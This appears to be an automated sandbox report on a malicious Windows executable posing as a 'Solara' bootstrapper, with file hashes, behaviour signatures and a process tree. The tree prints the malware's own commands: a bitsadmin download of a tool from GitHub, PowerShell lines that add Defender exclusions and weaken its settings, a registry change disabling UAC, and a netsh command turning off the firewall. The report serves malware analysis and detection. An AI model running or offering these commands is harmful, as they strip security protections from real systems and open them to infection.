Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/07/2024, 12:27

General

  • Target
    SolaraBootstrapper.exe
  • Size
    715KB
  • MD5
    f76e6a62661fdf7181a0072479b2f7c7
  • SHA1
    bd4995f5d5d39931cec7bdf7872c89ca1c98b5d0
  • SHA256
    f74f54580d6be2be3245755cd960e61a29f0b0766e3eec827cb2909d6c768801
  • SHA512
    526e948cffaacaa6caa9313d28bdf8b726a40d863a6b6021482497b7c121ed830141cdcc3128d08122d9e50ab39fc4a0ff6475640ea0790c3b099ed829f310b9
  • SSDEEP
    12288:gPwNKpOkwyszkgmBaPeMpAqrepwBWP3pwdDT6ulrGQ+Sf4JRZbsGOsyr4Fzi5:gPwAkkEzkgyaPhKpNPSDT6ulGtR6eFz

Malware Config

Signatures

  • UAC bypass (3 TTPs, 1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 11 IoCs)
    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  • Modifies Windows Firewall (2 TTPs, 1 IoC)
  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (2 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)
    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  • Download via BitsAdmin (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (12 IoCs)
  • Suspicious use of AdjustPrivilegeToken (12 IoCs)
  • Suspicious use of WriteProcessMemory (55 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Users\Admin\AppData\Local\Temp\Solara.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\12D5.tmp\12D6.tmp\12D7.bat C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\system32\cacls.exe
          "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
          4⤵
          PID:2444
        • C:\Windows\system32\wscript.exe
          wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
          4⤵
          PID:2856
        • C:\Windows\system32\bitsadmin.exe
          bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          4⤵
          • Download via BitsAdmin
          PID:2576
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          4⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1508
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -PUAProtection disable"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Add-MpPreference -ExclusionExtension "Solara.exe""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1856

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\12D5.tmp\12D6.tmp\12D7.bat
    Filesize
    3KB
    MD5
    ca8c6adbbd6da2a4a498fa35426ec982
    SHA1
    09e3d8616a6bfa8a5999324e6686139027acfb81
    SHA256
    ebb973dfe87b50bf8344ea291272ee1590f382a5735f92a56b8ef6d3d30fcf5c
    SHA512
    72520a8c8d61cd02469448c02017c2a3b039fb045358512a0a8cb8f2bd90fb46c5ac6027f88a6bab87d5ca1a96445809459ef18035bf32df246230d39d2b72b0
  • C:\Users\Admin\AppData\Local\Temp\tmp.vbs
    Filesize
    112B
    MD5
    9313d55e26ad30ddcbc046fe8013a21d
    SHA1
    a5712ce8864d7b0ca88b94c64226dfeb2221457f
    SHA256
    121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
    SHA512
    77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize
    7KB
    MD5
    de015ba5b82c0761db0f20dfa78e1535
    SHA1
    6cddb53932f20d49aef44dd01657f0b980cdb5aa
    SHA256
    37ad9b7f9a23a02db5c4c92be82704ec52abd7fbdf7b9ce194e9a77fd3069bd7
    SHA512
    d6c69a7f7b313d7e62150a4233be291e2f62b40a5486a1c74dd301f2e80e839c3915263ca33e3aafdb50bf4c2d61ea5487d3f758794d058728ba94aab7a5efd4
  • \Users\Admin\AppData\Local\Temp\Solara.exe
    Filesize
    123KB
    MD5
    97c55dabe9a79cd79f28c956776f7419
    SHA1
    1d24c86f2c31d8a099573e57e508aead646a1fce
    SHA256
    16f593cacbe6af31b0ec10b285bed89efb1b270f6bb29ec05fc98237f0194913
    SHA512
    1d26d2bcd410bc34e3a5e20562084423a143fd1d758ce28ed7841c9a15acba4425a8790b1357f722bad7200204a199e3830e9ab21343b8d72b0f7d4e5f523e8b
  • memory/1424-26-0x000000001B780000-0x000000001BA62000-memory.dmp
    Filesize
    2.9MB
  • memory/1424-27-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
    Filesize
    32KB
  • memory/2136-18-0x000000001B550000-0x000000001B832000-memory.dmp
    Filesize
    2.9MB
  • memory/2136-19-0x0000000001F00000-0x0000000001F08000-memory.dmp
    Filesize
    32KB
  • memory/2648-0-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize
    724KB